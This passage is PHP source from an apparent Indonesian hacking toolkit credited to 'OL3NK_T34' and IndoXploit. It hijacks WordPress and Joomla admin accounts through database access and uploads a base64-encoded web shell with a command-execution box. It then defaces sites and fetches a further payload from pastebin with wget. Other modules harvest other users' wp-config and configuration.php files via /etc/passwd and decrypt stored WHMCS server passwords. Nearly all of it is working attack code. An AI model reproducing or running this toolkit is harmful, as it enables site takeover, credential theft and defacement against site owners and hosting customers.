curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data6 = curl_exec ($ch);
return $data6;
   }

$site= "$target/wp-login.php";
$site2= "$target/wp-admin/theme-install.php?upload";
$a = lohgin($site, $target, $user_baru, $password_baru);
$b = lohgin($site2, $target, $user_baru, $password_baru);
         

$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
echo "# token -> $anu2<br>";


$olenk1 = base64_decode("TU9ERSBJREJURUFNDQo8P3BocA0KJGZpbGUzID0gJF9GSUxFU1snZmlsZTMnXTsNCiAgJG5ld2ZpbGUzPSJpZGIucGhwIjsNCiAgICAgICAgICAgICAgICBpZiAoZmlsZV9leGlzdHMoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKSkgdW5saW5rKCIuLi8uLi8uLi8uLi8iLiRuZXdmaWxlMyk7DQogICAgICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZTNbJ3RtcF9uYW1lJ10sICIuLi8uLi8uLi8uLi8kbmV3ZmlsZTMiKTsNCg0KPz4NCjw/cGhwDQppZihpc3NldCgkX0dFVFsnb2xlbmsnXSkpew0KZWNobyAnPGZvbnQgY29sb3I9InJlZCI+U3lzdGVtIE9TIDogPC9mb250Pjxmb250IGNvbG9yPSJnb2xkIj4nLnBocF91bmFtZSgpLic8L2ZvbnQ+PC9icj4nOw0Kc2V0X3RpbWVfbGltaXQoMCk7DQplcnJvcl9yZXBvcnRpbmcoMCk7DQppZihnZXRfbWFnaWNfcXVvdGVzX2dwYygpKXsNCmZvcmVhY2goJF9QT1NUIGFzICRrZXk9PiR2YWx1ZSl7DQokX1BPU1RbJGtleV0gPSBzdHJpcHNsYXNoZXMoJHZhbHVlKTsNCn0NCn0NCmVjaG8gJzwhRE9DVFlQRSBIVE1MPg0KPEhUTUw+DQo8c3R5bGU+DQpib2R5ew0KYmFja2dyb3VuZC1jb2xvcjp0cmFuc3BhcmFuOw0KYmFja2dyb3VuZDojMDAwOw0KYmFja2dyb3VuZC1wb3NpdGlvbjpjZW50ZXI7DQpiYWNrZ3JvdW5kLWF0dGFjaG1lbnQ6Zml4ZWQ7DQpiYWNrZ3JvdW5kLXJlcGVhdDpuby1yZXBlYXQ7DQp9DQppbnB1dCx0ZXh0YXJlYSxzZWxlY3R7DQpCT1JERVItUklHSFQ6IzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItVE9QOiMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUxFRlQ6IzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItQk9UVE9NOiMzZTNlM2UgMXB4IHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjojMWIxYjFiOw0KZm9udDpGaXhlZHN5cyBib2xkOw0KY29sb3I6IHJlZDsNCn0NCjwvc3R5bGU+DQo8SEVBRD4NCjxCT0RZPg0KPGZvbnQgY29sb3I9InJlZCI+Q3VycmVudCBQYXRoIDogPC9mb250Pic7DQppZigkX0dFVFsnb2xlbmsnXSl7DQokcGF0aCA9ICRfR0VUWydvbGVuayddOw0KfWVsc2V7DQokcGF0aCA9IGdldGN3ZCgpOw0KfQ0KJHBhdGggPSBzdHJfcmVwbGFjZSgnXFwnLCcvJywkcGF0aCk7DQokcGF0aHMgPSBleHBsb2RlKCcvJywkcGF0aCk7DQpmb3JlYWNoKCRwYXRocyBhcyAkaWQ9PiRwYXQpew0KaWYoJHBhdCA9PSAiIiAmJiAkaWQgPT0gMCl7DQokYSA9IHRydWU7DQplY2hvICc8YSBocmVmPSI/b2xlbms9Ij4vPC9hPic7DQpjb250aW51ZTsNCn0NCmlmKCRwYXQgPT0gIiIpIGNvbnRpbnVlOw0KZWNobyAnPGEgaHJlZj0iP29sZW5rPSc7DQpmb3IoJGk9MDskaTw9JGlkOyRpKyspew0KZWNobyAiJHBhdGhzWyRpXSI7DQppZigkaSAhPSAkaWQpIGVjaG8gIi8iOw0KfQ0KZWNobyAnIj48Zm9udCBjb2xvcj0ibGltZSI+Jy4kcGF0Lic8L2E+LzwvZm9udD4nOw0KfQ0KZWNobyAnPC90ZD48L3RyPjx0cj48dGQ+PC9icj4NCjxmb3JtIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCI+DQpVcGxvYWQgRmlsZSA6IDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIi8+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0idXBsb2FkIi8+DQo8L2Zvcm0+PC9icj4nOw0KaWYoaXNzZXQoJF9GSUxFU1snZmlsZSddKSl7DQppZihjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwkcGF0aC4nLycuJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKXsNCmVjaG8gJzxjZW50ZXI+PGZvbnQgY29sb3I9ImdyZWVuIj5VcGxvYWQgU3VjY2Vzcy4gOnY8L2ZvbnQ+PC9icj48Zm9udCBjb2xvcj0id2hpdGUiPkZpbGUgVXBsb2FkZWQgdG8gOiA8L2ZvbnQ+PGZvbnQgY29sb3I9ImxpbWUiPicuJHBhdGguJy8nLiRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddLic8L2ZvbnQ+PC9jZW50ZXI+JzsNCn1lbHNlew0KZWNobyAnPGNlbnRlcj48Zm9udCBjb2xvcj0icmVkIj5VcGxvYWQgRmFpbGVkLiA6djwvZm9udD48L2NlbnRlcj48YnIvPic7DQp9DQp9DQppZihpc3NldCgkX0dFVFsnb2xlbmsnXSkpew0KZWNobyAnPGZvcm0gbWV0aG9kPSJwb3N0Ij4NCjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkV4ZWN1dGUiPg0KPC9mb3JtPic7DQoNCmlmKGlzc2V0KCRfUE9TVFsnY21kJ10pKXsNCmlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsNCiRjbWQ9JF9QT1NUWydjbWQnXTsNCiRva2UgPSBzaGVsbF9leGVjKCIkY21kIik7DQplY2hvICI8dGV4dGFyZWEgIGNvbHM9MzAgcm93cz0zMDs+JG9rZTwvdGV4dGFyZWE+IjsNCn0NCn0NCmVjaG8gJzxjZW50ZXI+PGZvbnQgY29sb3I9IndoaXRlIj5Nb2RlIEJ5IDogPC9mb250Pjxmb250IGNvbG9yPSJyZWQiPk9MM05LX1QzNDwvZm9udD48L2NlbnRlcj4nOw0KfWVsc2V7DQplY2hvICI8L3A+PC9wPjwvcD48L3A+PGNlbnRlcj5IYWNrZWQgQnkgOiBPTDNOS19UMzQ8L2NlbnRlcj4iOw0KfQ0KfQ0KPz4=");
 
$olenk2 = "olenk.php";
$fp5 = fopen($olenk2,"w");
fputs($fp5,$olenk1);    
  $post2 = array(
               "_wpnonce" => "$anu2",
               "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
               "themezip" => "@olenk.php",
               "install-theme-submit" => "Install Now",
               );
$ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data3 = curl_exec ($ch);

$namafile = "olenk_idbteam.php";
$fp2 = fopen($namafile,"w");
fputs($fp2,$nick);

$y = date("Y");
$m = date("m");


$ch6 = curl_init("$target/wp-content/uploads/$y/$m/olenk.php");
curl_setopt($ch6, CURLOPT_POST, true);
curl_setopt($ch6, CURLOPT_POSTFIELDS,
array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
$postResult = curl_exec($ch6);
curl_close($ch6);

$as = "$target/idb.php";
$bs = file_get_contents($as);
 if(preg_match("#hacked by OL3NK_T34#si",$bs)){
                        echo "# <font color='green'>berhasil mepes...</font><br>";
                        echo "# $target/idb.php<br>";
                    }
                    else{
                        echo "# <font color='red'>gagal mepes...</font><br>";
                        echo "# <font color='green'>jika token muncul Hasil injectnya di mari :</font><br>";                                       echo "# $target/wp-content/uploads/$y/$m/olenk.php?olenk<br>";
                        echo "# jika ga muncul coba manual : <br>";
                        echo "# $target/wp-login.php<br>";
                        echo "# username: $user_baru<br>";
                        echo "# password: $password_baru<br>";

                       
                    }




      }

      elseif($tanya=="n"){
         echo "# Sukses<br>";
            echo "# username: $user_baru<br>";
            echo "# password: $password_baru<br>";
      }



   }else{
         echo '<form action="" method="post"><b><table class=tabnet>';
echo '<tr><th colspan="2"><b>-=[[ WP 1N73CT ]]=-</b></th></center></tr>';
echo '<tr><td>host</td><td><input class=olenk type=text size=40 name="host" value="localhost"></td></tr>';
echo '<tr><td>db name</td><td><input class=olenk type=text size=40 name="db"></td></tr>';
echo '<tr><td>db user</td><td><input class=olenk type=text size=40 name="username"></td></tr>';
echo '<tr><td>db pass</td><td><input class=olenk type=text size=40 name="password"></td></tr>';
echo '<tr><td>db prefix</td><td><input class=olenk type=text size=40 name="dbprefix"></td></tr>';
echo '<tr><td>user baru</td><td><input class=olenk type=text size=40 name="user_baru"></td></tr>';
echo '<tr><td>pass baru </td><td><input class=olenk type=text size=40 name="password_baru"></td></tr>';
echo '<tr><td>auto inject</td><td><input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n </td></tr>';
echo '<tr><td>nick </td><td><input class=olenk type=text size=40 name="nick" value="hacked by OL3NK_T34"></td></tr>';
echo '<tr><td>target :</td><td><input class=olenk type=text size=40 name="target"></td></tr>';
echo '<tr><td><input class=olenk1 type=submit value="1n73ct"></td></tr>
</table>';

      }
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk2')) {
echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ WP AUTO</span> <span class='b8'>IN73CT ]:=O</span></b></nobr><br/><br/> ";
echo "</br></br><center><b><span class='b11'> Coba Cek : <a href='t/coli.php' target='_blank'>[+] DI MARI [+]</a></center></span></br>";
if (!is_dir('s')) {
$mk = @mkdir('t', 0777);
@fwrite($f, $c);
$f2 = @fopen('t/coli.php', 'w');
$sml_db = "";
$write = fwrite($f2, base64_decode($sml_db));
if ($write) {
@chmod('t/coli.php', 0755);
}
echo "</br></br><center><b>CEK : <a href='t/coli.php' target='_blank'>[+] WP AUTO IN73CT [+]</a></center></br>";
}
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk3')) {
?>
<form action="?&amp;idb=olenk3" method="post">
<?php
error_reporting(0);
//Tu5b0l3d
//thx to: IndoXploit, Hacker-Newbie.org
//recode by OL3NK_T34


    if($_POST['submitt']){
  

        $host = $_POST['host'];

        $username = $_POST['username'];

        $password = $_POST['password'];

        $db = $_POST['db'];

        $dbprefix = $_POST['dbprefix'];

        $user_baru = $_POST['user_baru'];

        $password_baru = $_POST['password_baru'];

        $tanya = $_POST['tanya'];

        $target = $_POST['target'];


        $prefix = $dbprefix."users";

        $pass = md5("$password_baru");

        $upda = $db.".".$dbprefix;


        mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");

        mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");

 $tampil=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
    $r=mysql_fetch_array($tampil);
        $id = $r[id];
       

         mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");

        
                function token($target){
                    $ch2 = curl_init ("$target");
                    curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
                   curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                    curl_setopt ($ch2, CURLOPT_CONNECTTIMEOUT, 5);
                    curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
                    curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
                    curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
                    curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
                    $data = curl_exec ($ch2);
                   
                    
                        preg_match('/<input type="hidden" name="(.*?)" value="1"/', $data, $token);
                $token = $token[1];
                return $token;
            }
            
            if ($tanya == "y"){
                
                $path = "/administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA%3D%3D";
                $site = $target.$path;
                $token1 = token($site);


               
$post = array(
                    "username" => "$user_baru",
                    "passwd" => "$password_baru",
                    "lang" => "en-GB",
                    "option" => "com_login",
                    "task" => "login",
                    "return" => "aW5kZXgucGhw",
                    "$token1" => "1",
                    );

$ch = curl_init ("$site");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$masuk = curl_exec ($ch);

$token2 = token($site);

$upload = base64_decode("TU9ERSBJREJURUFNDQo8P3BocA0KJGZpbGUzID0gJF9GSUxFU1snZmlsZTMnXTsNCiAgJG5ld2ZpbGUzPSJpZGIucGhwIjsNCiAgICAgICAgICAgICAgICBpZiAoZmlsZV9leGlzdHMoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKSkgdW5saW5rKCIuLi8uLi8uLi8uLi8iLiRuZXdmaWxlMyk7DQogICAgICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZTNbJ3RtcF9uYW1lJ10sICIuLi8uLi8uLi8uLi8kbmV3ZmlsZTMiKTsNCg0KPz4NCjw/cGhwDQppZihpc3NldCgkX0dFVFsnb2xlbmsnXSkpew0KZWNobyAnPGZvbnQgY29sb3I9InJlZCI+U3lzdGVtIE9TIDogPC9mb250Pjxmb250IGNvbG9yPSJnb2xkIj4nLnBocF91bmFtZSgpLic8L2ZvbnQ+PC9icj4nOw0Kc2V0X3RpbWVfbGltaXQoMCk7DQplcnJvcl9yZXBvcnRpbmcoMCk7DQppZihnZXRfbWFnaWNfcXVvdGVzX2dwYygpKXsNCmZvcmVhY2goJF9QT1NUIGFzICRrZXk9PiR2YWx1ZSl7DQokX1BPU1RbJGtleV0gPSBzdHJpcHNsYXNoZXMoJHZhbHVlKTsNCn0NCn0NCmVjaG8gJzwhRE9DVFlQRSBIVE1MPg0KPEhUTUw+DQo8c3R5bGU+DQpib2R5ew0KYmFja2dyb3VuZC1jb2xvcjp0cmFuc3BhcmFuOw0KYmFja2dyb3VuZDojMDAwOw0KYmFja2dyb3VuZC1wb3NpdGlvbjpjZW50ZXI7DQpiYWNrZ3JvdW5kLWF0dGFjaG1lbnQ6Zml4ZWQ7DQpiYWNrZ3JvdW5kLXJlcGVhdDpuby1yZXBlYXQ7DQp9DQppbnB1dCx0ZXh0YXJlYSxzZWxlY3R7DQpCT1JERVItUklHSFQ6IzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItVE9QOiMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUxFRlQ6IzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItQk9UVE9NOiMzZTNlM2UgMXB4IHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjojMWIxYjFiOw0KZm9udDpGaXhlZHN5cyBib2xkOw0KY29sb3I6IHJlZDsNCn0NCjwvc3R5bGU+DQo8SEVBRD4NCjxCT0RZPg0KPGZvbnQgY29sb3I9InJlZCI+Q3VycmVudCBQYXRoIDogPC9mb250Pic7DQppZigkX0dFVFsnb2xlbmsnXSl7DQokcGF0aCA9ICRfR0VUWydvbGVuayddOw0KfWVsc2V7DQokcGF0aCA9IGdldGN3ZCgpOw0KfQ0KJHBhdGggPSBzdHJfcmVwbGFjZSgnXFwnLCcvJywkcGF0aCk7DQokcGF0aHMgPSBleHBsb2RlKCcvJywkcGF0aCk7DQpmb3JlYWNoKCRwYXRocyBhcyAkaWQ9PiRwYXQpew0KaWYoJHBhdCA9PSAiIiAmJiAkaWQgPT0gMCl7DQokYSA9IHRydWU7DQplY2hvICc8YSBocmVmPSI/b2xlbms9Ij4vPC9hPic7DQpjb250aW51ZTsNCn0NCmlmKCRwYXQgPT0gIiIpIGNvbnRpbnVlOw0KZWNobyAnPGEgaHJlZj0iP29sZW5rPSc7DQpmb3IoJGk9MDskaTw9JGlkOyRpKyspew0KZWNobyAiJHBhdGhzWyRpXSI7DQppZigkaSAhPSAkaWQpIGVjaG8gIi8iOw0KfQ0KZWNobyAnIj48Zm9udCBjb2xvcj0ibGltZSI+Jy4kcGF0Lic8L2E+LzwvZm9udD4nOw0KfQ0KZWNobyAnPC90ZD48L3RyPjx0cj48dGQ+PC9icj4NCjxmb3JtIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCI+DQpVcGxvYWQgRmlsZSA6IDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIi8+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0idXBsb2FkIi8+DQo8L2Zvcm0+PC9icj4nOw0KaWYoaXNzZXQoJF9GSUxFU1snZmlsZSddKSl7DQppZihjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwkcGF0aC4nLycuJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKXsNCmVjaG8gJzxjZW50ZXI+PGZvbnQgY29sb3I9ImdyZWVuIj5VcGxvYWQgU3VjY2Vzcy4gOnY8L2ZvbnQ+PC9icj48Zm9udCBjb2xvcj0id2hpdGUiPkZpbGUgVXBsb2FkZWQgdG8gOiA8L2ZvbnQ+PGZvbnQgY29sb3I9ImxpbWUiPicuJHBhdGguJy8nLiRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddLic8L2ZvbnQ+PC9jZW50ZXI+JzsNCn1lbHNlew0KZWNobyAnPGNlbnRlcj48Zm9udCBjb2xvcj0icmVkIj5VcGxvYWQgRmFpbGVkLiA6djwvZm9udD48L2NlbnRlcj48YnIvPic7DQp9DQp9DQppZihpc3NldCgkX0dFVFsnb2xlbmsnXSkpew0KZWNobyAnPGZvcm0gbWV0aG9kPSJwb3N0Ij4NCjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkV4ZWN1dGUiPg0KPC9mb3JtPic7DQoNCmlmKGlzc2V0KCRfUE9TVFsnY21kJ10pKXsNCmlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsNCiRjbWQ9JF9QT1NUWydjbWQnXTsNCiRva2UgPSBzaGVsbF9leGVjKCIkY21kIik7DQplY2hvICI8dGV4dGFyZWEgIGNvbHM9MzAgcm93cz0zMDs+JG9rZTwvdGV4dGFyZWE+IjsNCn0NCn0NCmVjaG8gJzxjZW50ZXI+PGZvbnQgY29sb3I9IndoaXRlIj5Nb2RlIEJ5IDogPC9mb250Pjxmb250IGNvbG9yPSJyZWQiPk9MM05LX1QzNDwvZm9udD48L2NlbnRlcj4nOw0KfWVsc2V7DQplY2hvICI8L3A+PC9wPjwvcD48L3A+PGNlbnRlcj5IYWNrZWQgQnkgOiBPTDNOS19UMzQ8L2NlbnRlcj4iOw0KfQ0KfQ0KPz4=");

$post2 = array(
                    "jform[source]" => "$upload",
                    "task" => "template.save",
                    "$token2" => "1",
                    "jform[extension_id]"=> "503",
                    "jform[filename]" => "/error.php",
                    );

$ch3 = curl_init ("$site");
curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch3, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch3, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch3, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch3, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch3, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch3, CURLOPT_POST, 1);
curl_setopt ($ch3, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch3, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch3, CURLOPT_COOKIEFILE,'coker_log');
$masuk2 = curl_exec ($ch3);

if(preg_match("#successfully#is", $masuk2)){
echo "uploader udh ketanem...<br>";
echo "# akses d sini.. => $target/templates/beez3/error.php?olenk";
echo "lanjut mepes...<br>";

$file_pepes = "olenk-IDBTEAM.php";
$ch4 =curl_init("$target/templates/beez3/error.php");
                            curl_setopt($ch4, CURLOPT_POST, true);
                            curl_setopt($ch4, CURLOPT_POSTFIELDS,
                            array('file'=>"@$file_pepes"));
                            curl_setopt($ch4, CURLOPT_RETURNTRANSFER, 1);
                            curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
                            curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
                            $postResult = curl_exec($ch4);
                            curl_close($ch4);


   $ch5 = "$target/idb.php";
$file2 = @file_get_contents($ch5);
                            

                     if(preg_match('#hacked#is', $file2)){
                        echo "<font color='green'>berhasil mepes...</font><br>";
                        echo "$target/idb.php<br>";
                    }
                    else{
                        echo "<font color='red'>gagal mepes...</font><br>";
                        echo "coba aja manual: <br>";
                        echo "$target/administrator<br>";
                        echo "username: $user_baru<br>";
                        echo "password: $password_baru<br>";

                       
                    }
                


}
else{
    echo "failed<br>";
    echo "data udh bener. beda template mungkin :(<br>";
    echo "coba aja manual: <br>";
    echo "$target/administrator<br>";
    echo "username: $user_baru<br>";
    echo "password: $password_baru<br><br>";
    echo "atau coba yg path 2<br>";
    system('wget http://pastebin.com/raw.php?i=1Bfg7mF6');
    system('cp raw.php?i=1Bfg7mF6 joomlah2.php');
    echo "<a href='/joomlah2.php' target='_blank' style='text-decoration:none;'>Disini..</a><br>";
}


curl_close($ch3);
curl_close($ch);





            }
            elseif($tanya == "n"){
            echo "Sukses<br>";
            echo "username: $user_baru<br>";
            echo "password: $password_baru<br>";

            }
        

        }



        else{

         echo '<form action="" method="post"><b><table class=tabnet>';
echo '<tr><th colspan="2"><b>-=[[ JOOMLAH ]]=-</b></th></center></tr>';
echo '<tr><td>host</td><td><input class=olenk type=text size=40 name="host" value="localhost"></td></tr>';
echo '<tr><td>db user</td><td><input class=olenk type=text size=40 name="username"></td></tr>';
echo '<tr><td>db pass</td><td><input class=olenk type=text size=40 name="password"></td></tr>';
echo '<tr><td>db name</td><td><input class=olenk type=text size=40 name="db"></td></tr>';
echo '<tr><td>db prefix</td><td><input class=olenk type=text size=40 name="dbprefix"></td></tr>';
echo '<tr><td>user baru</td><td><input class=olenk type=text size=40 name="user_baru"></td></tr>';
echo '<tr><td>pass baru </td><td><input class=olenk type=text size=40 name="password_baru"></td></tr>';
echo '<tr><td>auto inject</td><td><input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n </td></tr>';
echo '<tr><td>target </td><td><input class=olenk type=text size=40 name="target"></td></tr>';
echo '<tr><td><input class=olenk1 type="submit" value="Submit" name="submitt"></td></tr>
</table>';
        }
}

?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk4')) {
?>
<form action="?&amp;idb=olenk4" method="post">
<?php
// Tu5b0l3d
// thx to: IndoXPloit, HNc
// Config Wordpress and Joomla Grabber
error_reporting(0);
 echo "<h1><center>Created By IndoXploit<br><a href='roct/'style='text-decoration:none;'>Open Configs</a></center><br></h1>";
//$us = file_get_contents("/etc/passwd");
$usa = fopen('/etc/passwd','r');
$dir = mkdir('roct', 0777);
$rrrr = "Options all 
 DirectoryIndex configs.html 
 Require None 
 Satisfy Any";
$frr = fopen('roct/.htaccess', 'w');

fwrite($frr, $rrrr);
while($us = fgets($usa)){
if($us==""){
    echo "cann't read /etc/passwd";
}
else{
preg_match_all('/(.*?):x:/', $us, $user_byk);

    foreach($user_byk[1] as $user){
        $dir1 = "/home/$user/public_html/";
        if(is_readable($dir1)){
            $dir = "/home/$user/public_html/wp-config.php";
            $dir2 = "/home/$user/public_html/configuration.php";
            $ambil = file_get_contents($dir);
            
        
            if($ambil==""){
                $ambil_joom = file_get_contents($dir2);
                if($ambil_joom==""){                
                  echo "<font color='green'>$user <= Readable (Bukan Wordpress dan Joomla)<br></font>";
                
            }
            else{

                $file1 = "roct/$user-configuration.txt";
                $fp2 = fopen($file1,"w");
                fputs($fp2,$ambil_joom);

                echo "<a href='roct/$user-configuration.txt'style='text-decoration:none;'>$user </a> <= Joomla<br>";
                
            }
                
            }
            else{

                $file1 = "roct/$user-wpconfig.txt";
                $fp2 = fopen($file1,"w");
                fputs($fp2,$ambil);

                echo "<a href='roct/$user-wpconfig.txt'style='text-decoration:none;'>$user </a> <= Wordpress<br>";
                
            }


    }
        else{
            
             
        }

   }

}

}
}
   ?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk5')) {
?>
<form action="?&amp;idb=olenk5" method="post">
<?php
echo '<form action="" method="post"><b><table class=tabnet>';
echo '<tr><th colspan="2"><b>-=[[ WHMCS DECODER ]]=-</b></th></center></tr>';
echo '<tr><td>host</td><td><input class=olenk type=text size=40 name="host" value="localhost"></td></tr>';
echo '<tr><td>db name</td><td><input class=olenk type=text size=40 name="db"></td></tr>';
echo '<tr><td>db user</td><td><input class=olenk type=text size=40 name="username"></td></tr>';
echo '<tr><td>db pass</td><td><input class=olenk type=text size=40 name="password"></td></tr>';
echo '<tr><td>cc_encript</td><td><input class=olenk type=text size=40 name="cc_encrypt"></td></tr>';
echo '<tr><td><input class=olenk1 type=submit name="olenktea" value="hajar kang"></td></tr>
</table>';

set_time_limit(0);
if(isset($_POST['olenktea'])){
$db_host = $_POST['host'];
$db_username = $_POST['username'];
$db_password = $_POST['password'];
$db_name = $_POST['db'];
$cc_encryption_hash = $_POST['cc_encrypt'];
$mysql_charset = 'utf8';
@mysql_connect($db_host,$db_username,$db_password);
@mysql_select_db($db_name);

function cut($start,$end,$top){
$c =strlen($start);
$desc= strstr("$top","$start");
$count = strpos("$desc","$end");
$desc = substr($desc,$c,$count-$c);
return $desc;
}

function dec($string,$cc_encryption_hash){
$key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
$hash_key = _hash($key);
$hash_length = strlen($hash_key);
$string = base64_decode($string);
$tmp_iv = substr($string,0,$hash_length);
$string = substr($string,$hash_length,strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length){
$iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen($string)){
if(($c != 0 AND $c % $hash_length == 0)){
$key = _hash($key . substr($out,$c - $hash_length,$hash_length));
}
$out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}


function _hash($string){
if(function_exists("sha1")) {
$hash = sha1($string);
} else {
$hash = md5($string);
}
$out = "";
$c  = 0;
while ($c < strlen($hash)) {
$out .= chr(hexdec($hash[$c] . $hash[$c + 1]));
$c += 2;
}
return $out;
} 



$query = mysql_query("SELECT *FROM tblservers");
echo "<hr><br/><center><font color='orange' size='5'><b><u>Host Root</b></u></font></center><br/> <table border='1' cellpadding='5' align='center'>
<tr> <td align='center'><b> <font color='orange'> TYPE</font></b></td>
<td align='center'><b> <font color='orange'> ACTIVE </font></b></td>
<td align='center'><b> <font color='orange'> IP ADDRESS</font></b></td>
<td align='center'><b> <font color='orange'> USERNAME</font></b></td>
<td align='center'><b> <font color='orange'> PASSWORD</font></b></td>
<td align='center'><b> <font color='orange'>ACCESS HASH</font></b></td> 
<td align='center'><b> <font color='orange'>NAME SERVER</font></b> 
</tr>";
        
while($v = mysql_fetch_array($query)) {
$II11II11II11II11 = fopen("olenk1.txt","a");
echo "<tr>
<td align='center'> <font color='green'> {$v['type']}</font></td>
<td align='center'> <font color='green'> {$v['active']}</font></td>
<td align='center'> <font color='green'> {$v['ipaddress']}</font></td>
<td> <font color='green'> {$v['username']}</font></td>
<td> <font color='green'> ".dec($v['password'],$cc_encryption_hash)."</font></td>
<td> <font color='green'><textarea> {$v['accesshash']}</textarea></font></td> 
<td> <font color='green'> {$v['nameserver1']}</font></td>
</tr>";
$bagong = $v['accesshash'];
